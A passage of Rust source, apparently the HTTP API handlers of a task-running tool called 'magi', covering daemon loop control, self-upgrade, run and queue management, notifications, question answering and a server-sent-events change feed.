1839 daemon: DaemonView,
1842}
1843
1844#[derive(Debug, Clone, Copy)]
1853struct Foreign {
1854 pid: Option<u32>,
1856}
1857
1858impl Foreign {
1859 fn of(reading: Option<&daemon::Reading>) -> Option<Self> {
1862 let reading = reading?;
1863 if !reading.running(Timestamp::now()) {
1864 return None;
1865 }
1866 match reading.pid {
1867 Some(pid) if pid == std::process::id() => None,
1868 pid => Some(Self { pid }),
1872 }
1873 }
1874
1875 fn who(&self) -> String {
1878 match self.pid {
1879 Some(pid) => format!("another magi process (pid {pid})"),
1880 None => "another magi process".to_owned(),
1881 }
1882 }
1883}
1884
1885type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1890
1891fn launch_daemon(
1893 opts: daemon::Opts,
1894 stop: daemon::Stop,
1895) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1896 Box::pin(daemon::serve_until(opts, stop))
1897}
1898
1899#[derive(Debug, Default)]
1901struct LoopState {
1902 live: Option<Live>,
1904 rev: u64,
1912 last_error: Option<String>,
1915}
1916
1917#[derive(Debug)]
1919struct Live {
1920 stop: daemon::Stop,
1922 handle: tokio::task::JoinHandle<()>,
1927 opts: daemon::Opts,
1931}
1932
1933impl Live {
1934 fn alive(&self) -> bool {
1936 !self.handle.is_finished()
1937 }
1938}
1939
1940fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1947 state.lock().unwrap_or_else(PoisonError::into_inner)
1948}
1949
1950async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1952 blocking(move || {
1953 let reading = daemon::read_status(&ui.home);
1954 Ok(Json(ui.loop_view(reading)))
1955 })
1956 .await
1957}
1958
1959#[derive(Debug, Deserialize)]
1965#[serde(deny_unknown_fields)]
1966struct LoopCommand {
1967 running: bool,
1968 #[serde(default)]
1978 park: bool,
1979}
1980
1981async fn loop_post(
1989 State(ui): State<Arc<Ui>>,
1990 body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1991) -> ApiResult<Json<LoopView>> {
1992 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1995 blocking(move || {
1996 let reading = daemon::read_status(&ui.home);
1997 let foreign = Foreign::of(reading.as_ref());
1998 if body.running {
1999 ui.start_loop(foreign)?;
2000 } else {
2001 ui.stop_loop(foreign, body.park)?;
2002 }
2003 Ok(Json(ui.loop_view(reading)))
2004 })
2005 .await
2006}
2007
2008#[derive(Debug, Serialize)]
2010struct UpgradeView {
2011 from: String,
2013 to: Option<String>,
2015 parked: Option<String>,
2017 detail: String,
2019}
2020
2021async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2045 let reading = daemon::read_status(&ui.home);
2046 if let Some(other) = Foreign::of(reading.as_ref()) {
2047 return Err(ApiError::conflict(format!(
2048 "the loop belongs to {}, so replacing this binary would leave \
2049 that process running an old one against the same queue. Upgrade \
2050 where it was started.",
2051 other.who()
2052 )));
2053 }
2054
2055 if crate::updater::disabled_by_env() {
2061 return Ok((
2062 StatusCode::OK,
2063 Json(UpgradeView {
2064 from: env!("CARGO_PKG_VERSION").to_owned(),
2065 to: None,
2066 parked: None,
2067 detail: format!(
2068 "Automatic updates are disabled by {}. Nothing was parked \
2069 and nothing restarted.",
2070 crate::updater::NO_AUTOUPDATE_ENV
2071 ),
2072 }),
2073 ));
2074 }
2075
2076 let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2081 let from = env!("CARGO_PKG_VERSION").to_owned();
2082 let latest = match crate::updater::Checker::new(&cfg.update) {
2083 Some(checker) => checker
2084 .newer_release()
2085 .await
2086 .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2087 None => None,
2088 };
2089 let Some(latest) = latest else {
2090 return Ok((
2091 StatusCode::OK,
2092 Json(UpgradeView {
2093 from,
2094 to: None,
2095 parked: None,
2096 detail: "Already on the newest release. Nothing was parked \
2097 and nothing restarted."
2098 .to_owned(),
2099 }),
2100 ));
2101 };
2102
2103 let parked = ui.park_for_upgrade()?;
2106 let detail = match &parked {
2107 Some(run) => format!(
2112 "Run {} is parking at its next step, which can take as long as \
2113 the step it is on - up to an hour for an implement wave. The \
2114 deck replaces itself once it parks, comes back, and the loop \
2115 carries that run on from where it stopped. Nothing is lost if \
2116 you close this.",
2117 crate::run::short_of(run)
2118 ),
2119 None => "The deck replaces itself and comes back. Nothing was in \
2120 flight to park."
2121 .to_owned(),
2122 };
2123
2124 let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2128 progress.parked_run = parked.clone();
2129 let _ = updater::write_progress(&ui.home, &progress);
2130
2131 let home = ui.home.clone();
2132 tokio::spawn(async move {
2133 if let Err(e) = upgrade_and_restart(home.clone()).await {
2134 tracing::error!("the upgrade did not complete: {e:#}");
2135 if let Some(mut progress) = updater::read_progress(&home) {
2136 progress.fail(format!("{e:#}"));
2137 let _ = updater::write_progress(&home, &progress);
2138 }
2139 }
2140 });
2141
2142 Ok((
2143 StatusCode::ACCEPTED,
2144 Json(UpgradeView {
2145 from,
2146 to: Some(latest.tag_name),
2147 parked,
2148 detail,
2149 }),
2150 ))
2151}
2152
2153async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2158 crate::updater::run_self_update(true, false, true).await?;
2161 tracing::info!("binary replaced - asking the server to hand over");
2162 if let Some(mut progress) = updater::read_progress(&home) {
2163 progress.advance(updater::Stage::Replaced);
2164 let _ = updater::write_progress(&home, &progress);
2165 }
2166 HANDOVER.notify_one();
2167 Ok(())
2168}
2169
2170#[derive(Debug, Serialize)]
2176struct RunSummary {
2177 id: String,
2178 short: String,
2179 status: String,
2180 done: bool,
2181 instruction: String,
2182 title: String,
2183 repo: String,
2184 repo_name: String,
2185 created_at: String,
2186 updated_at: String,
2187 candidates: usize,
2188 viable: usize,
2189 judges: usize,
2190 winner: Option<char>,
2191 reviews: usize,
2192 quota_losses: usize,
2193 event: Option<String>,
2194 superseded_by: Option<String>,
2199 waiting: bool,
2206 live: crate::run::Liveness,
2210 pr: Option<crate::run::PrRecord>,
2212 unmerged_by_design: bool,
2218}
2219
2220impl RunSummary {
2221 fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2222 Self {
2223 id: state.id.clone(),
2224 short: state.short().to_owned(),
2225 status: status_word(state.status),
2226 done: state.status.done(),
2227 unmerged_by_design: state.unmerged_by_design(),
2228 instruction: state.instruction.clone(),
2229 title: title_from(&state.instruction, TITLE_MAX),
2230 repo: state.repo.display().to_string(),
2231 repo_name: state
2232 .repo
2233 .file_name()
2234 .map(|n| n.to_string_lossy().into_owned())
2235 .unwrap_or_default(),
2236 created_at: state.created_at.to_string(),
2237 updated_at: state.updated_at.to_string(),
2238 candidates: state.candidates.len(),
2239 viable: state.viable().len(),
2240 judges: state.config.graph.judges,
2241 winner: state.winner().map(|c| c.label),
2242 reviews: state.reviews.len(),
2243 quota_losses: state.quota.len(),
2244 event: state.events.last().map(|e| e.message.clone()),
2245 waiting,
2246 live,
2247 superseded_by: None,
2250 pr: state.pr.clone(),
2251 }
2252 }
2253}
2254
2255fn status_word(status: RunStatus) -> String {
2258 status.as_str().to_owned()
2262}
2263
2264#[derive(Debug, Deserialize)]
2266struct ListQuery {
2267 #[serde(default)]
2268 limit: Option<usize>,
2269}
2270
2271async fn runs_list(
2272 State(ui): State<Arc<Ui>>,
2273 Query(q): Query<ListQuery>,
2274) -> ApiResult<Json<Vec<RunSummary>>> {
2275 let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2276 blocking(move || {
2277 let superseded = superseded_runs(&ui.queue);
2278 let open_runs: HashSet<String> = ui
2282 .questions
2283 .list()
2284 .into_iter()
2285 .filter(|q| q.status.open())
2286 .map(|q| q.run)
2287 .collect();
2288 let claimed: HashSet<String> =
2289 crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2290 .into_iter()
2291 .map(|c| c.run)
2292 .collect();
2293 let states = run_ids(&ui.runs)
2294 .into_iter()
2295 .filter_map(|id| read_run(&ui.runs, &id).ok())
2300 .take(limit);
2301 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2302 let summaries = summarize(
2303 states,
2304 &open_runs,
2305 &claimed,
2306 &superseded,
2307 |p| probe.borrow_mut().status(p),
2308 |p| probe.borrow_mut().started_at(p),
2309 );
2310 Ok(Json(summaries))
2311 })
2312 .await
2313}
2314
2315fn summarize<I, S, D>(
2321 states: I,
2322 open_runs: &HashSet<String>,
2323 claimed: &HashSet<String>,
2324 superseded: &HashMap<String, String>,
2325 mut status_q: S,
2326 mut identity_q: D,
2327) -> Vec<RunSummary>
2328where
2329 I: IntoIterator<Item = RunState>,
2330 S: FnMut(u32) -> Option<bool>,
2331 D: FnMut(u32) -> Option<String>,
2332{
2333 states
2334 .into_iter()
2335 .map(|state| {
2336 let waiting = open_runs.contains(&state.id);
2337 let live =
2338 state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2339 let mut row = RunSummary::of(&state, waiting, live);
2340 row.superseded_by = superseded
2341 .get(&state.id)
2342 .map(String::as_str)
2343 .map(crate::run::short_of)
2344 .map(str::to_owned);
2345 row
2346 })
2347 .collect()
2348}
2349
2350fn superseded_runs(queue: &Queue) -> HashMap<String, String> {
2363 let mut by = HashMap::new();
2364 for task in queue.list() {
2365 for pair in task.runs.windows(2) {
2366 if let [earlier, later] = pair {
2367 by.insert(earlier.clone(), later.clone());
2368 }
2369 }
2370 }
2371 by
2372}
2373
2374#[derive(Debug, Serialize)]
2381struct RunDetailView {
2382 #[serde(flatten)]
2383 state: RunState,
2384 instruction_md: Vec<md::Node>,
2385 live: crate::run::Liveness,
2400 unmerged_by_design: bool,
2405}
2406
2407impl RunDetailView {
2408 fn of(state: RunState, live: crate::run::Liveness) -> Self {
2409 Self {
2410 instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2411 live,
2412 unmerged_by_design: state.unmerged_by_design(),
2413 state,
2414 }
2415 }
2416}
2417
2418async fn run_detail(
2419 State(ui): State<Arc<Ui>>,
2420 Path(id): Path<String>,
2421) -> ApiResult<Json<RunDetailView>> {
2422 blocking(move || {
2423 let id = resolve_run(&ui.runs, &id)?;
2424 let state = read_run(&ui.runs, &id)?;
2425 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2426 let live = state.liveness(daemon_claims);
2427 Ok(Json(RunDetailView::of(state, live)))
2428 })
2429 .await
2430}
2431
2432async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2441 let (id, unreadable) = {
2442 let ui = Arc::clone(&ui);
2443 blocking(move || {
2444 let id = resolve_run(&ui.runs, &id)?;
2445 match read_run(&ui.runs, &id) {
2446 Ok(state) => {
2447 let in_flight =
2448 crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2449 state
2450 .ensure_can_delete(in_flight)
2451 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2452 let dir = ui.runs.join(&id);
2453 std::fs::remove_dir_all(&dir)
2454 .with_context(|| format!("remove run directory {}", dir.display()))?;
2455 Ok((id, false))
2456 }
2457 Err(_) => {
2458 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2462 return Err(ApiError::conflict(format!(
2463 "run {id} is being worked on by a live daemon right now"
2464 )));
2465 }
2466 Ok((id, true))
2467 }
2468 }
2469 })
2470 .await?
2471 };
2472 if unreadable {
2473 crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2474 .await
2475 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2476 }
2477 let ui = Arc::clone(&ui);
2478 let done = id.clone();
2479 blocking(move || {
2480 ui.questions.abandon_for_run(
2483 &done,
2484 &format!("run {done} was deleted, so nothing is waiting for this answer"),
2485 )?;
2486 Ok(())
2487 })
2488 .await?;
2489 Ok(StatusCode::NO_CONTENT)
2490}
2491
2492async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2516 let (id, state) = {
2517 let ui = Arc::clone(&ui);
2518 blocking(move || {
2519 let id = resolve_run(&ui.runs, &id)?;
2520 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2521 return Err(ApiError::conflict(format!(
2522 "run {id} is being worked on by a live daemon right now"
2523 )));
2524 }
2525 let state = read_run(&ui.runs, &id).ok();
2526 Ok((id, state))
2527 })
2528 .await?
2529 };
2530 let removed = match state {
2531 Some(mut state) => {
2532 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2533 .await
2534 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2535 if removed.is_empty() {
2540 crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2541 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2542 }
2543 removed
2544 }
2545 None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2546 .await
2547 .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2548 };
2549 Ok(Json(FoldView {
2550 run: id,
2551 removed_count: removed.len(),
2552 removed,
2553 }))
2554}
2555
2556#[derive(Debug, Serialize)]
2558struct FoldView {
2559 run: String,
2560 removed: Vec<String>,
2562 removed_count: usize,
2563}
2564
2565async fn run_resume(
2585 State(ui): State<Arc<Ui>>,
2586 Path(id): Path<String>,
2587) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2588 let (id, state) = {
2589 let ui = Arc::clone(&ui);
2590 blocking(move || {
2591 let id = resolve_run(&ui.runs, &id)?;
2592 let state = read_run(&ui.runs, &id)?;
2593 Ok((id, state))
2594 })
2595 .await?
2596 };
2597 if !state.status.resumable() {
2598 return Err(ApiError::conflict(format!(
2599 "run {} is `{}`, and only a stalled or blocked run can be resumed",
2600 state.short(),
2601 status_word(state.status)
2602 )));
2603 }
2604 if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2609 .into_iter()
2610 .next()
2611 {
2612 return Err(ApiError::conflict(format!(
2613 "the loop is running run {} right now; stop it first, or wait for \
2614 it to finish, before resuming a run by hand.",
2615 crate::run::short_of(&work.run)
2616 )));
2617 }
2618 let _resume = ui.begin_resume(&id)?;
2619
2620 let queued = RunSummary::of(
2623 &state,
2624 !ui.questions.open_for(&id).is_empty(),
2625 state.liveness(false),
2626 );
2627 let run = id.clone();
2628 tokio::spawn(async move {
2629 let _resume = _resume;
2630 match crate::graph::Runner::resume(&run) {
2631 Ok(mut runner) => {
2632 if let Err(e) = runner.execute().await {
2633 tracing::warn!("resume of run {run} stopped: {e:#}");
2634 }
2635 }
2636 Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2639 }
2640 });
2641 Ok((StatusCode::ACCEPTED, Json(queued)))
2642}
2643
2644async fn run_report(
2645 State(ui): State<Arc<Ui>>,
2646 Path(id): Path<String>,
2647) -> ApiResult<impl IntoResponse> {
2648 let text = blocking(move || {
2649 let id = resolve_run(&ui.runs, &id)?;
2650 let state = read_run(&ui.runs, &id)?;
2654 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2655 let live = state.liveness(daemon_claims);
2656 Ok(format!(
2657 "{}{}",
2658 report::run(&state),
2659 report::active_seats(&state, live)
2660 ))
2661 })
2662 .await?;
2663 Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2664}
2665
2666#[derive(Debug, Serialize)]
2672struct TaskView {
2673 #[serde(flatten)]
2674 task: Task,
2675 source_label: String,
2676 status_str: &'static str,
2677 instruction_md: Vec<md::Node>,
2681 waits_on: Vec<String>,
2685 stuck_roots: Vec<String>,
2688}
2689
2690impl From<Task> for TaskView {
2691 fn from(task: Task) -> Self {
2692 Self {
2693 source_label: task.source.label(),
2694 status_str: task.status.as_str(),
2695 instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2696 waits_on: Vec::new(),
2697 stuck_roots: Vec::new(),
2698 task,
2699 }
2700 }
2701}
2702
2703impl TaskView {
2704 fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2705 let waits_on = inv.waits_on(&task);
2706 let stuck_roots = inv
2707 .stuck_roots(&task)
2708 .iter()
2709 .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2710 .collect();
2711 Self {
2712 waits_on,
2713 stuck_roots,
2714 ..Self::from(task)
2715 }
2716 }
2717}
2718
2719#[derive(Debug, Default, Deserialize)]
2722#[serde(default)]
2723struct ReposQuery {
2724 refresh: u8,
2725}
2726
2727async fn repos_list(
2734 State(ui): State<Arc<Ui>>,
2735 Query(q): Query<ReposQuery>,
2736) -> ApiResult<Json<Vec<repos::Repo>>> {
2737 let refresh = q.refresh != 0;
2738 blocking(move || {
2739 let (cfg, _) = Config::discover(&ui.repo, None)?;
2740 Ok(Json(ui.repos_cache.list(
2741 &cfg.repos.roots,
2742 Duration::from_secs(cfg.repos.scan_ttl),
2743 refresh,
2744 )))
2745 })
2746 .await
2747}
2748
2749async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2750 blocking(move || {
2751 let tasks = ui.queue.list();
2752 let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2753 Ok(Json(
2754 tasks
2755 .into_iter()
2756 .map(|t| TaskView::with_inventory(t, &inv))
2757 .collect(),
2758 ))
2759 })
2760 .await
2761}
2762
2763#[derive(Debug, Default, Deserialize)]
2766#[serde(default, deny_unknown_fields)]
2767struct HoldBody {
2768 reason: Option<String>,
2769}
2770
2771async fn queue_hold(
2772 State(ui): State<Arc<Ui>>,
2773 Path(id): Path<String>,
2774 body: std::result::Result<Json<HoldBody>, JsonRejection>,
2775) -> ApiResult<Json<TaskView>> {
2776 let body = match body {
2780 Ok(Json(body)) => body,
2781 Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
2782 Err(e) => return Err(ApiError::bad_request(e.body_text())),
2783 };
2784 let reason = body.reason.filter(|r| !r.trim().is_empty());
2785 mutate(ui, id, move |t| {
2786 t.hold_manual(reason.clone());
2787 Ok(())
2788 })
2789 .await
2790}
2791
2792async fn queue_release(
2793 State(ui): State<Arc<Ui>>,
2794 Path(id): Path<String>,
2795) -> ApiResult<Json<TaskView>> {
2796 mutate(ui, id, |t| {
2797 t.release();
2798 Ok(())
2799 })
2800 .await
2801}
2802
2803#[derive(Debug, Deserialize)]
2805#[serde(deny_unknown_fields)]
2806struct PriorityBody {
2807 priority: i32,
2808}
2809
2810async fn queue_priority(
2816 State(ui): State<Arc<Ui>>,
2817 Path(id): Path<String>,
2818 body: std::result::Result<Json<PriorityBody>, JsonRejection>,
2819) -> ApiResult<Json<TaskView>> {
2820 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2821 mutate(ui, id, move |t| t.set_priority(body.priority)).await
2822}
2823
2824#[derive(Debug, Deserialize)]
2826#[serde(deny_unknown_fields)]
2827struct EditBody {
2828 title: String,
2829 instruction: String,
2830}
2831
2832async fn queue_edit(
2836 State(ui): State<Arc<Ui>>,
2837 Path(id): Path<String>,
2838 body: std::result::Result<Json<EditBody>, JsonRejection>,
2839) -> ApiResult<Json<TaskView>> {
2840 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2841 mutate(ui, id, move |t| {
2842 t.edit(body.title.clone(), body.instruction.clone())
2843 })
2844 .await
2845}
2846
2847async fn queue_done(
2855 State(ui): State<Arc<Ui>>,
2856 Path(id): Path<String>,
2857) -> ApiResult<Json<TaskView>> {
2858 mutate(ui, id, |t| {
2859 t.succeed();
2860 Ok(())
2861 })
2862 .await
2863}
2864
2865async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2873 blocking(move || {
2874 let id = resolve_task(&ui.queue, &id)?;
2875 let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
2876 ui.queue
2877 .remove(&id, in_flight, &ui.questions)
2878 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2879 Ok(StatusCode::NO_CONTENT)
2880 })
2881 .await
2882}
2883
2884async fn mutate(
2893 ui: Arc<Ui>,
2894 id: String,
2895 change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
2896) -> ApiResult<Json<TaskView>> {
2897 blocking(move || {
2898 let id = resolve_task(&ui.queue, &id)?;
2899 let _claim = ui.queue.claim(&id).map_err(|e| {
2904 ApiError::conflict(format!(
2905 "{e:#} - a daemon is running this task, so it cannot be \
2906 changed from here yet"
2907 ))
2908 })?;
2909 let mut task = ui.queue.get(&id)?;
2910 change(&mut task).map_err(ApiError::bad_request_from)?;
2911 ui.queue.put(&mut task)?;
2912 Ok(Json(TaskView::from(task)))
2913 })
2914 .await
2915}
2916
2917async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
2925 let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
2926 tokio::spawn(async move {
2927 let mut ticker = tokio::time::interval(POLL);
2928 let mut last: Option<(u64, u64, u64, u64, u64, u64)> = None;
2929 loop {
2930 ticker.tick().await;
2933 let state = Arc::clone(&ui);
2934 let revisions = tokio::task::spawn_blocking(move || {
2935 (
2936 state.queue.revision(),
2937 runs_revision(&state.runs),
2938 state.questions.revision(),
2939 state.talks.revision(),
2940 state.notices.revision(),
2941 state.lock_loop().rev,
2945 )
2946 })
2947 .await;
2948 let Ok(revisions) = revisions else { break };
2949 if last == Some(revisions) {
2950 continue;
2951 }
2952 last = Some(revisions);
2953 let payload = serde_json::json!({
2954 "queue_rev": revisions.0,
2955 "runs_rev": revisions.1,
2956 "questions_rev": revisions.2,
2957 "talks_rev": revisions.3,
2958 "notifications_rev": revisions.4,
2959 "loop_rev": revisions.5,
2960 });
2961 let Ok(event) = Event::default().event("change").json_data(payload) else {
2963 break;
2964 };
2965 if tx.send(event).await.is_err() {
2966 break;
2967 }
2968 }
2969 });
2970 Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
2971 .keep_alive(KeepAlive::new().interval(KEEPALIVE))
2972}
2973
2974fn runs_revision(runs: &FsPath) -> u64 {
2981 use std::hash::{Hash as _, Hasher as _};
2982
2983 let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
2984 .into_iter()
2985 .flatten()
2986 .flatten()
2987 .filter_map(|e| {
2988 let path = e.path().join("run.json");
2989 let mtime = path
2990 .metadata()
2991 .ok()?
2992 .modified()
2993 .ok()?
2994 .duration_since(std::time::UNIX_EPOCH)
2995 .ok()?
2996 .as_millis() as u64;
2997 let id = e.file_name().to_string_lossy().into_owned();
2998 Some((id, mtime))
2999 })
3000 .collect();
3001
3002 if entries.is_empty() {
3003 return 0;
3004 }
3005
3006 entries.sort_unstable();
3007 let mut hasher = std::hash::DefaultHasher::new();
3008 for (id, mtime) in &entries {
3009 id.hash(&mut hasher);
3010 mtime.hash(&mut hasher);
3011 }
3012 let h = hasher.finish();
3013 if h == 0 { 1 } else { h }
3014}
3015
3016fn run_ids(runs: &FsPath) -> Vec<String> {
3022 let mut ids: Vec<String> = std::fs::read_dir(runs)
3023 .into_iter()
3024 .flatten()
3025 .flatten()
3026 .filter(|e| e.path().join("run.json").is_file())
3027 .map(|e| e.file_name().to_string_lossy().into_owned())
3028 .collect();
3029 ids.sort_unstable_by(|a, b| b.cmp(a));
3031 ids
3032}
3033
3034fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3036 let path = runs.join(id).join("run.json");
3037 let body =
3038 std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3039 let state: RunState =
3040 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3041 if state.schema != run::SCHEMA {
3042 anyhow::bail!(
3043 "run {} was written by a different magi (schema {}, this build speaks {})",
3044 state.id,
3045 state.schema,
3046 run::SCHEMA
3047 );
3048 }
3049 Ok(state)
3050}
3051
3052#[must_use]
3060pub fn runs_unreadable(runs: &FsPath) -> usize {
3061 run_ids(runs)
3062 .into_iter()
3063 .filter(|id| read_run(runs, id).is_err())
3064 .count()
3065}
3066
3067fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3069 if runs.join(id).join("run.json").is_file() {
3070 return Ok(id.to_owned());
3071 }
3072 pick(run_ids(runs), id, "run")
3073}
3074
3075fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3077 if queue.path_of(id).is_file() {
3078 return Ok(id.to_owned());
3079 }
3080 pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3081}
3082
3083#[derive(Debug, Serialize)]
3094struct QuestionView {
3095 #[serde(flatten)]
3096 question: Question,
3097 detail_md: Vec<md::Node>,
3098 waiting_on_agent: bool,
3108}
3109
3110impl From<Question> for QuestionView {
3111 fn from(question: Question) -> Self {
3112 let base = md::ImageBase::QuestionPanel {
3113 id: question.id.clone(),
3114 };
3115 Self {
3116 detail_md: md::to_nodes(&question.detail, &base),
3117 waiting_on_agent: question.waiting_on_agent(),
3118 question,
3119 }
3120 }
3121}
3122
3123async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3129 blocking(move || {
3130 Ok(Json(
3131 ui.questions
3132 .list()
3133 .into_iter()
3134 .map(QuestionView::from)
3135 .collect(),
3136 ))
3137 })
3138 .await
3139}
3140
3141async fn notifications_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3144 blocking(move || {
3145 let items = ui.notices.list();
3146 let unread = items.iter().filter(|n| n.unread()).count();
3147 Ok(Json(
3148 serde_json::json!({ "unread": unread, "items": items }),
3149 ))
3150 })
3151 .await
3152}
3153
3154fn notice_error(e: anyhow::Error) -> ApiError {
3155 ApiError::not_found(format!("{e:#}"))
3158}
3159
3160async fn notification_read(
3162 State(ui): State<Arc<Ui>>,
3163 Path(id): Path<String>,
3164) -> ApiResult<Json<Notice>> {
3165 blocking(move || ui.notices.mark_read(&id).map(Json).map_err(notice_error)).await
3166}
3167
3168async fn notification_dismiss(
3170 State(ui): State<Arc<Ui>>,
3171 Path(id): Path<String>,
3172) -> ApiResult<Json<Notice>> {
3173 blocking(move || ui.notices.dismiss(&id).map(Json).map_err(notice_error)).await
3174}
3175
3176async fn notifications_read_all(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3178 blocking(move || {
3179 let changed = ui.notices.mark_all_read()?;
3180 Ok(Json(serde_json::json!({ "marked": changed })))
3181 })
3182 .await
3183}
3184
3185#[derive(Debug, Default, Deserialize)]
3191#[serde(default, deny_unknown_fields)]
3192struct NewAnswer {
3193 choice: Option<String>,
3194 text: Option<String>,
3195}
3196
3197async fn question_answer(
3198 State(ui): State<Arc<Ui>>,
3199 Path(id): Path<String>,
3200 body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3201) -> ApiResult<Json<QuestionView>> {
3202 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3203 let answer = match (body.choice, body.text) {
3204 (Some(c), None) => Answer::Choice(c),
3205 (None, Some(t)) => Answer::Text(t),
3206 (Some(_), Some(_)) => {
3207 return Err(ApiError::bad_request(
3208 "send either `choice` or `text`, not both",
3209 ));
3210 }
3211 (None, None) => {
3212 return Err(ApiError::bad_request("send a `choice` or a `text`"));
3213 }
3214 };
3215
3216 blocking(move || {
3217 let id = resolve_question(&ui.questions, &id)?;
3218 let mut q = ui
3219 .questions
3220 .get(&id)
3221 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3222 if !q.status.open() {
3223 return Err(ApiError::conflict(format!(
3227 "question {} is already {}",
3228 q.short(),
3229 q.status.as_str()
3230 )));
3231 }
3232 q.answer(answer).map_err(ApiError::bad_request_from)?;
3236 ui.questions.put(&mut q)?;
3237 Ok(Json(QuestionView::from(q)))
3238 })
3239 .await
3240}
3241
3242#[derive(Debug, Deserialize)]
3244#[serde(deny_unknown_fields)]
3245struct NewSay {
3246 body: String,
3247}
3248
3249async fn question_say(
3259 State(ui): State<Arc<Ui>>,
3260 Path(id): Path<String>,
3261 body: std::result::Result<Json<NewSay>, JsonRejection>,
3262) -> ApiResult<Json<QuestionView>> {
3263 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3264 blocking(move || {
3265 let id = resolve_question(&ui.questions, &id)?;
3266 let mut q = ui
3267 .questions
3268 .get(&id)
3269 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3270 if !q.status.open() {
3271 return Err(ApiError::conflict(format!(
3275 "question {} is already {}",
3276 q.short(),
3277 q.status.as_str()
3278 )));
3279 }
3280 q.say(body.body).map_err(ApiError::bad_request_from)?;
3283 ui.questions.put(&mut q)?;
3284 Ok(Json(QuestionView::from(q)))
3285 })
3286 .await
3287}
3288
3289fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3291 if store.path_of(id).is_file() {
3292 return Ok(id.to_owned());
3293 }
3294 pick(
3295 store.list().into_iter().map(|q| q.id).collect(),
3296 id,
3297 "question",
3298 )
3299}
3300
3301async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3316 blocking(move || {
3317 let id = resolve_question(&ui.questions, &id)?;
3318 let Some(html) = ui.questions.panel_html(&id) else {
3319 return Err(ApiError::not_found(format!("question {id} has no panel")));
3320 };
3321 Ok(panel_response(
3322 "text/html; charset=utf-8",
3323 false,
3324 html.into_bytes(),
3325 ))
3326 })
3327 .await
3328}
3329
3330async fn question_asset(
3358 State(ui): State<Arc<Ui>>,
